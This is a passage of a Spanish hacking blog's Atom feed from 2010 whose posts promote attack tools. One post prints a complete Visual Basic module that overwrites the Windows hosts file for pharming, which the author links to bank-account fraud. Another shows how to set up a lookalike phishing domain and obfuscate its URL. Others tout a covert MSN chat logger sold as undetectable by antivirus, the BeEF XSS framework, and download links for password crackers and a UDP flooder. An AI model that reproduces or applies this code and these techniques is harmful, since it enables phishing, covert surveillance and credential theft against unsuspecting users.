scheme="http://www.blogger.com/atom/ns#" term="Hacking General" /><category scheme="http://www.blogger.com/atom/ns#" term="Virus y Malware" /><category scheme="http://www.blogger.com/atom/ns#" term="Tool" /><title>Prohide Msn Live Logger - Espía Conversaciones</title><content type="html">Nuestro Compatriota Prohide otra de nuevo ha hecho de las suyas, ha creado un programa muy bueno, con este programa podemos básicamente ver conversaciones de MSN, El funcionamiento es muy simple todos aquellos que alguna ves manejaron un Troyano o Keylogger se les hará parecido el funcionamiento.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;el programa tiene un aspecto como este:&lt;br /&gt;&lt;br /&gt;&lt;img src="http://archivo.prohide.com/imagenes/ProHide%20Msn%20Live%20Logger.png" height="300" width="400"&gt;&lt;/img&gt;&lt;br /&gt;&lt;br /&gt;Lo que hace básicamente el programa es obtener las conversaciones de MSN de una PC "Infectada" con esto, esto te puede servir para observar las conversaciones de la gente de la empresa a la que se le otorga MSN, para ver un mas detallado funcionamiento den click &lt;a href="http://www.prohide.com/?Mostrar=ProHide-Msn-Live-Logger"&gt;aquí&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;La Desventaja de este programa si lo queremos hacer sin que la "víctima" se entere debemos tener acceso físico a la computadora sin embargo PROHIDE nos ofrece una Versión PAGADA del Software con el cual podemos hacerlo sin que se de cuenta la víctima, no lo detecta ningun Antivirus asi que no tendrán problema.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.prohide.com/?Mostrar=ProHide-Msn-Live-Logger"&gt;Referencia&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.prohide.com"&gt;&lt;br /&gt;Web de Prohide&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-7664767195655824575?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/7664767195655824575/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=7664767195655824575&amp;isPopup=true" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/7664767195655824575?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/7664767195655824575?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2010/01/prohide-msn-live-logger-espia.html" title="Prohide Msn Live Logger - Espía Conversaciones" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="16377452928107230442" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;DkYBRHY4eCp7ImA9WxBQGEw.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-470952631183984976</id><published>2010-01-18T03:14:00.000-08:00</published><updated>2010-01-18T03:29:15.830-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-18T03:29:15.830-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Xss" /><category scheme="http://www.blogger.com/atom/ns#" term="pentest" /><category scheme="http://www.blogger.com/atom/ns#" term="pentesting" /><category scheme="http://www.blogger.com/atom/ns#" term="pen-test" /><category scheme="http://www.blogger.com/atom/ns#" term="Hacking General" /><category scheme="http://www.blogger.com/atom/ns#" term="Tool" /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad Informática" /><title>BeEF Xss t00l</title><content type="html">Jbyte hace unos dias me mostró esta t00l ya que tenía tiempo sin visitar &lt;a href="http://www.pentester.es/"&gt;pentester&lt;/a&gt; y no le tome mucha importancia por que pensé que era un simple botnet pero era mas que eso, esta t00l es una especie de botnet que a la ves te permite atacar a tu victima por Ejecución de Código JavaScript; esta t00l se llama &lt;a href="http://www.bindshell.net/tools/beef/"&gt;BeEF&lt;/a&gt; como les dije permite atacar a travéz de código JavaScript, es una t00l que te facilita la inyección y ejecución de este tipo de código aun lo estoy probando pero está muy interesante, te facilita el uso de este tipo de ataques...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;aquí un pequeño Gráfico de su uso, está bien explicado...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://1.bp.blogspot.com/_ywZ68m8Vt3A/S0zvB1DXiOI/AAAAAAAAAUg/hcfl0if3350/s1600/beef.PNG" height="300" width="400"&gt;&lt;/img&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Tiene una interfaz que hace fácil el uso, se las muestro a continuación:&lt;br /&gt;&lt;br /&gt;&lt;img src="http://3.bp.blogspot.com/_ywZ68m8Vt3A/S0zw2BWMWsI/AAAAAAAAAUo/qO78Ejs7C7w/s400/beef02.PNG" height="300" width="400"&gt;&lt;/img&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Los de Pentester dan una mejor explicación de su funcionamiento que yo me limito a no determinar ya que lo he usado solo un rato apenas llevo dos horas con el programita... y pues me gustaría que lo prueben conmigo ya que al parecer está bueno...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Click &lt;a href="http://www.pentester.es/2010/01/beef-xss-impact-tool.html"&gt;aquí&lt;/a&gt; para ver en pentester&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;lo interesante de esta t00l es que te permite seleccionar un par de módulos con los cuales podamos hacer explotación de software local de la pc que atacamos, overflows, ejecución de código remoto y este tipo de ataques...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Aqui les presento unas cuantas diapositivas donde se muestra un poco del uso de este software...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="width:425px;text-align:left" id="__ss_2789163"&gt;&lt;a style="font:14px Helvetica,Arial,Sans-serif;display:block;margin:12px 0 3px 0;text-decoration:underline;" href="http://www.slideshare.net/jholgui/seguridad-web-xss-y-beef" title="Seguridad Web XSS y BeEF"&gt;Seguridad Web XSS y BeEF&lt;/a&gt;&lt;object style="margin:0px" width="425" height="355"&gt;&lt;param name="movie" value="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=seguridadwebxssbeefslideshare-091228170709-phpapp01&amp;stripped_title=seguridad-web-xss-y-beef" /&gt;&lt;param name="allowFullScreen" value="true"/&gt;&lt;param name="allowScriptAccess" value="always"/&gt;&lt;embed src="http://static.slidesharecdn.com/swf/ssplayer2.swf?doc=seguridadwebxssbeefslideshare-091228170709-phpapp01&amp;stripped_title=seguridad-web-xss-y-beef" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="355"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;div style="font-size:11px;font-family:tahoma,arial;height:26px;padding-top:2px;"&gt;View more &lt;a style="text-decoration:underline;" href="http://www.slideshare.net/"&gt;documents&lt;/a&gt; from &lt;a style="text-decoration:underline;" href="http://www.slideshare.net/jholgui"&gt;Jose Miguel Holguin&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-470952631183984976?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/470952631183984976/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=470952631183984976&amp;isPopup=true" title="4 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/470952631183984976?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/470952631183984976?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2010/01/beef-xss-t00l.html" title="BeEF Xss t00l" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="16377452928107230442" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/_ywZ68m8Vt3A/S0zvB1DXiOI/AAAAAAAAAUg/hcfl0if3350/s72-c/beef.PNG" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">4</thr:total></entry><entry gd:etag="W/&quot;D0QMQXg5eSp7ImA9WxBQFU0.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-1295047683358515591</id><published>2010-01-14T13:30:00.000-08:00</published><updated>2010-01-14T13:43:00.621-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-14T13:43:00.621-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="pentest" /><category scheme="http://www.blogger.com/atom/ns#" term="pentesting" /><category scheme="http://www.blogger.com/atom/ns#" term="pen-test" /><category scheme="http://www.blogger.com/atom/ns#" term="backtrack" /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad Informática" /><title>BackTrack 4 Release - a Descargar!</title><content type="html">&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_Jx-hAg65Epo/S0u44G6aJpI/AAAAAAAAAR8/p7Mjw4qW9X0/s400/main-page.png"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 400px; height: 173px;" src="http://4.bp.blogspot.com/_Jx-hAg65Epo/S0u44G6aJpI/AAAAAAAAAR8/p7Mjw4qW9X0/s400/main-page.png" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Como muchos saben durante meses en &lt;a href="http://www.remote-exploit.org/backtrack.html"&gt;http://www.remote-exploit.org/backtrack.html&lt;/a&gt; se podian ver actualizaciones del Sistema Operativo y en si las descargas dando un par de clicks... desde hace unos dias desde esa web ya no se actualizará lo que es backtrack sino que lo haran desde un nuevo dominio &lt;a href="http://www.backtrack-linux.org/"&gt;http://www.backtrack-linux.org/&lt;/a&gt; en ese dominio podemos encontrar la descarga de lo que es backtrack 4 ahora si ya podremos testear a full... tuve la oportunidad de enterarme rápido y la Imagen ISO ya está en un pendrive... ahora en la web no solo van a poder encontrar la &lt;a href="http://moon.backtrack-linux.org/downloads/bt4-final.iso"&gt;ISO para un Live CD&lt;/a&gt; y &lt;a href="http://moon.backtrack-linux.org/downloads/bt4-final-vm.zip"&gt;la version para VMWARE&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;bueno yo no les cuento mas solo den click &lt;a href="http://www.backtrack-linux.org/"&gt;aquí&lt;/a&gt; y vean todo lo nuevo que hay hacerca de backtrack, no se olviden cualquier duda a la &lt;a href="http://es.remote-exploit.org"&gt;comunidad hispana de backtrack&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Suscribanse al Blog :) pronto comenzaré a escribir a diario de nuevo.&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-1295047683358515591?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/1295047683358515591/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=1295047683358515591&amp;isPopup=true" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/1295047683358515591?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/1295047683358515591?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2010/01/backtrack-4-release-descargar.html" title="BackTrack 4 Release - a Descargar!" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="16377452928107230442" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/_Jx-hAg65Epo/S0u44G6aJpI/AAAAAAAAAR8/p7Mjw4qW9X0/s72-c/main-page.png" height="72" width="72" /><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;C0IEQnk9eCp7ImA9WxBQEkg.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-2770433950548242715</id><published>2010-01-11T13:38:00.000-08:00</published><updated>2010-01-11T15:11:43.760-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-11T15:11:43.760-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="seguridadblanca" /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad Informática" /><category scheme="http://www.blogger.com/atom/ns#" term="anti-hacking" /><title>Análisis - Phishing de MSN</title><content type="html">&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://i45.tinypic.com/2eav6t3.jpg"&gt;&lt;img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 265px; height: 270px;" src="http://i45.tinypic.com/2eav6t3.jpg" border="0" alt="" /&gt;&lt;/a&gt;&lt;br /&gt;Hoy quiero tratar de dar unas pautas del motivo por el cual es tan fácil engañar gente para que nos de su clave de msn con phishing...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;En primera, vamos a hacer la comparación con como se ve facebook un login...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;facebook:&lt;br /&gt;&lt;br /&gt;http://www.facebook.com/login.php&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Hotmail:&lt;br /&gt;&lt;br /&gt;http://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1263246246&amp;rver=6.0.5285.0&amp;wp=MBI&amp;wreply=http:%2F%2Fmail.live.com%2Fdefault.aspx&amp;lc=3082&amp;id=64855&amp;mkt=es-es&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Análisis de los login... el de Hotmail pues como nos damos cuenta está en un subdominio, nos da variables cualquieras, tiene una especie de variable que llama al sitio http://mail.live.com/default.aspx o convoca por algún motivo o algo.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Gracias a Esto podríamos usar una técnica conocida como URL OBFUSCATION, ahora les voy a dar un ejemplo de como podriamos hacer eso&lt;br /&gt;&lt;br /&gt;digamos que nos compramos el dominio liives.com o compramos loginlive-account.com algo por el estilo ahora vamos a ponerle un sub-dominio a nuestro dominio comprado&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;http://msn.loginlive-account.com&lt;br /&gt;&lt;br /&gt;ahora subimos nuestro SCAM&lt;br /&gt;&lt;br /&gt;http://msn.loginlive-account.com/windows/msn/messenger/connect/index.php&lt;br /&gt;&lt;br /&gt;OFUSCADA:&lt;br /&gt;&lt;br /&gt;http%3A%2F%2Fmsn%2Eloginlive%2Daccount%2Ecom%2Fwindows%2Fmsn%2Fmessenger%2Fconnect%2Findex%2Ephp&lt;br /&gt;&lt;br /&gt;Otra opción:&lt;br /&gt;&lt;br /&gt;http://0/wind%6fw%73/ms%6e/mes%73eng%65r/%63o%6ene%63t/i%6e%64ex.%70%68%70&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Como ofuscamos:&lt;br /&gt;&lt;a href="http://www.keyone.co.uk/tools-url-encoder.asp"&gt;&lt;br /&gt;http://www.keyone.co.uk/tools-url-encoder.asp&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;o sino:&lt;br /&gt;&lt;a href="http://funkyfilters.com/url/obfuscation/"&gt;&lt;br /&gt;http://funkyfilters.com/url/obfuscation/&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Eso en cuestion al Login...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Ahora las actualizaciones de imagenes, por ejemplo yo siempre ando probando las nuevas cosas que me entero que salen entonces por ahí, en mi msn tengo mucha gente y por ahí escucho nuevo SCAM de Facebook entonces yo digo mm ¿nuevo? lo que pasa es que Facebook en muchas ocaciones cambia el lugar donde hostea sus imágenes, lo hacia mas seguido antes pero ahora no tanto, esto es como una medida de seguridad...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Otro aspecto que hace tan vulnerable a hotmail son las páginas del tipo www.quienteadmite.com en esta página se supone que se da el servicio de ver quien te tiene bloqueado, la gente no conocedora del tema se logguea y ve quienes le han dado a no admitir y pues gracias a esto muchos tienen sus messengers pero otros también entran.&lt;br /&gt;&lt;br /&gt;este ha sido un pequeño análisis de por que es tan común robar cuentas de msn...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-2770433950548242715?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/2770433950548242715/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=2770433950548242715&amp;isPopup=true" title="1 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/2770433950548242715?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/2770433950548242715?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2010/01/analisis-phishing-de-msn.html" title="Análisis - Phishing de MSN" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="16377452928107230442" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">1</thr:total></entry><entry gd:etag="W/&quot;DUQNSXo-eyp7ImA9WxBQEEk.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-1393046809018369951</id><published>2010-01-08T23:42:00.000-08:00</published><updated>2010-01-09T06:29:58.453-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-09T06:29:58.453-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="pharming" /><category scheme="http://www.blogger.com/atom/ns#" term="programacion" /><category scheme="http://www.blogger.com/atom/ns#" term="Tool" /><title>Hosts Poisoning T00l</title><content type="html">Antes que todo quería pedir disculpas por escribir tan poco pero ando en época de examenes y pues no tengo tiempo de escribir pero ahora le quiero dar unos minutitos al blog para enseñarles esta t00l tan curiosa que he encontrado...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Dando Vueltas por blogs de malware y troyanos en general, lógico solo para mantenerme actualizado, di con que en &lt;a href="http://www.professional-hacker.org"&gt;Professional Hacker&lt;/a&gt; han puesto un módulo con el cual se puede hacer hosts poisoning, que quiero decir con hosts poisoning, ya hemos hablado antes sobre el pharming y esto es pharming, lo que hacemos es modificar el archivo /etc/hosts para que crean que al entrar en una página está todo bien sin embargo están navegando en un fake pero en el browser dice que están en la página real...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Esta técnica se usa para la estafa, la mayoría de veces para robo de cuentas bancarias, esta técnica como antes mencionado se llama pharming, ahora si, &lt;a href="http://foro.elhacker.net/scripting/batch_infector_de_dns_v20_pharming-t264995.0.html"&gt;aquí&lt;/a&gt; podemos ver el ejemplo de un programa que usa lo mas común que es un bat pero lo que les voy a presentar es un módulo que he estado analizando y al parecer funciona a la perfección, lo digo por que los batch para hacer esta función en windows 7 y vista no funcionan bien, por eso el módulo que les daré es tan importante, tiene para hacerlo a windows 7 y windows vista.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;el módulo solo te facilita el poder escribir ek módulo pero te da la opción de que hagas un programita con mas funciones...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;El Code:&lt;br /&gt;&lt;br /&gt;&lt;code&gt;&lt;br /&gt;'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;''''''''''''''''''' HOSTS POISONING MODULE BY XA0S  '''''''''''''''''''''''''''&lt;br /&gt;'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;' Creado por Xa0s                                                             '&lt;br /&gt;' www.professional-hacker.org                                                 '&lt;br /&gt;' Modulo encargado de editar el archivo Hosts de Windows                      '&lt;br /&gt;'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;Public Function hosts(insertar As String, windows As String) As String&lt;br /&gt;Dim w2 As String&lt;br /&gt;If windows = 95 Then&lt;br /&gt;w2 = "C:\Windows\hosts"&lt;br /&gt;Else&lt;br /&gt;If windows = 98 Then&lt;br /&gt;w2 = "C:\Windows\hosts"&lt;br /&gt;Else&lt;br /&gt;If windows = "Me" Then&lt;br /&gt;w2 = "C:\Windows\hosts"&lt;br /&gt;Else&lt;br /&gt;If windows = "NT" Then&lt;br /&gt;w2 = "C:\WINNT\System32\drivers\etc\hosts"&lt;br /&gt;Else&lt;br /&gt;If windows = 2000 Then&lt;br /&gt;w2 = "C:\WINNT\System32\drivers\etc\hosts"&lt;br /&gt;Else&lt;br /&gt;If windows = "XP" Then&lt;br /&gt;w2 = "C:\Windows\System32\drivers\etc\hosts"&lt;br /&gt;Else&lt;br /&gt;If windows = 2003 Then&lt;br /&gt;w2 = "C:\Windows\System32\drivers\etc\hosts"&lt;br /&gt;Else&lt;br /&gt;If windows = "Vista" Then&lt;br /&gt;w2 = "C:\Windows\System32\drivers\etc\hosts"&lt;br /&gt;Else&lt;br /&gt;If windows = "7" Then&lt;br /&gt;w2 = "C:\Windows\System32\drivers\etc\hosts"&lt;br /&gt;Else&lt;br /&gt;MsgBox "Error de Sistema Operativo", vbCritical, "Hosts Poisoning Module By Xa0s"&lt;br /&gt;Exit Function&lt;br /&gt;End If&lt;br /&gt;End If&lt;br /&gt;End If&lt;br /&gt;End If&lt;br /&gt;End If&lt;br /&gt;End If&lt;br /&gt;End If&lt;br /&gt;End If&lt;br /&gt;End If&lt;br /&gt;Open w2 For Output As #1&lt;br /&gt;Print #1, "// Hosts Poisoning Module By Xa0s //"&lt;br /&gt;Print #1, insertar&lt;br /&gt;Close #1&lt;br /&gt;End Function&lt;br /&gt;&lt;br /&gt;'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;'''''''''''''''''''''''''''''''' MODO DE USO ''''''''''''''''''''''''''''''''''&lt;br /&gt;'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;' call hosts(AQUI LO QUE QUIERAS ESCRIBIR EN EL HOSTS, SISTEMA OPERATIVO)     '&lt;br /&gt;'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;br /&gt;' El sistema operativo puede ser:                                             '&lt;br /&gt;'--- 95, 98, ME, 2000, NT, 2003, XP, VISTA, 7                                 '&lt;br /&gt;''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''&lt;/code&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;en el mismo código se especifica mucho...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;espero esto les sirva por que yo se los doy con esta idea pero ustedes pueden usarlo para escribir otros archivos, uno nunca sabe algo como esto le pueda servir.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;PD: el código no se ve todo pero solo hagan copy paste de lo que se supone está y luego peguenlo en un bloc de notas o en el ide de visual y ya, les saldrá el código mas grande que es el real.&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-1393046809018369951?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/1393046809018369951/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=1393046809018369951&amp;isPopup=true" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/1393046809018369951?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/1393046809018369951?v=2" /><link rel="alternate" type="text/html" href="http://www.seguridadblanca.org/2010/01/hosts-poisoning-t00l.html" title="Hosts Poisoning T00l" /><author><name>Dr.White</name><uri>http://www.blogger.com/profile/00396289618746910605</uri><email>noreply@blogger.com</email><gd:extendedProperty name="OpenSocialUserId" value="16377452928107230442" /></author><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></entry><entry gd:etag="W/&quot;C08CQH04fSp7ImA9WxBRF04.&quot;"><id>tag:blogger.com,1999:blog-8719246101146926876.post-4178981241070950488</id><published>2010-01-04T15:02:00.000-08:00</published><updated>2010-01-05T14:51:01.335-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-01-05T14:51:01.335-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="pentest" /><category scheme="http://www.blogger.com/atom/ns#" term="pentesting" /><category scheme="http://www.blogger.com/atom/ns#" term="pen-test" /><category scheme="http://www.blogger.com/atom/ns#" term="Hacking General" /><category scheme="http://www.blogger.com/atom/ns#" term="Tool" /><category scheme="http://www.blogger.com/atom/ns#" term="Seguridad Informática" /><title>Herramientas Que Facilitan Nuestro Trabajo - SB te los da, no lo pidas a los reyes magos ;)</title><content type="html">A la larga todo lo que yo les he enseñado o recordado estoy seguro queles ha servido por lo menos de algo, pero así como hacemos las cosas manuales también hay herramientas que nos facilitan las cosas, durante el año 2009 hablé de algunas de ellas pero aquí les voy a dar una lista de las que yo les recomiendo...&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.unsec.net/download/bsqlbf.pl"&gt;&lt;br /&gt;SqlBFT00ls&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.foundstone.com/knowledge/zips/udpflood.zip"&gt;&lt;br /&gt;UDP Flooder&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.oxid.it/downloads/irs18.exe"&gt;&lt;br /&gt;IRS Scanner de Servicios Activos&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://project-rainbowcrack.com/index.htm#download"&gt;&lt;br /&gt;Rainbow Tables Cracker&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.ks-soft.com/download/ip-tools.exe"&gt;&lt;br /&gt;Ip-T00ls&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.telefonica.net/web2/telamarinera/h/brutus.zip"&gt;&lt;br /&gt;Brutus AE&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://download.aircrack-ng.org/aircrack-ng-0.6.1-win.zip"&gt;&lt;br /&gt;AirCrack Windows&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://download.aircrack-ng.org/aircrack-ng-0.6.1.tar.gz"&gt;&lt;br /&gt;AirCrack Linux&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.securityfocus.com/data/tools/warpwatch.zip"&gt;&lt;br /&gt;Win Arp Watch&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://overdose.tcpteam.org/rpvs.exe"&gt;&lt;br /&gt;RPVS&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.safety-lab.com/SSS.exe"&gt;&lt;br /&gt;Shadow Security Scanner&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://nessus.org/download/"&gt;&lt;br /&gt;Nessus&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.telefonica.net/web2/telamarinera/h/exa.zip"&gt;&lt;br /&gt;h-edit&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.acunetix.com/vulnerability-scanner/download.htm"&gt;&lt;br /&gt;Acunetix Web Vuñnerability Scanner&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;las herramientas que no encuentren aquí pueden buscarlas en google pero estas son de las mejores que no he mensionado...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Espero les sirvan estas herramientas...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Saludos&lt;br /&gt;Dr.White&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8719246101146926876-4178981241070950488?l=www.seguridadblanca.org' alt='' /&gt;&lt;/div&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.seguridadblanca.org/feeds/4178981241070950488/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="https://www.blogger.com/comment.g?blogID=8719246101146926876&amp;postID=4178981241070950488&amp;isPopup=true" title="1 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/4178981241070950488?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/8719246101146926876/posts/default/4178981241070950488?v=2" /><link rel="alternate" type="text/html" 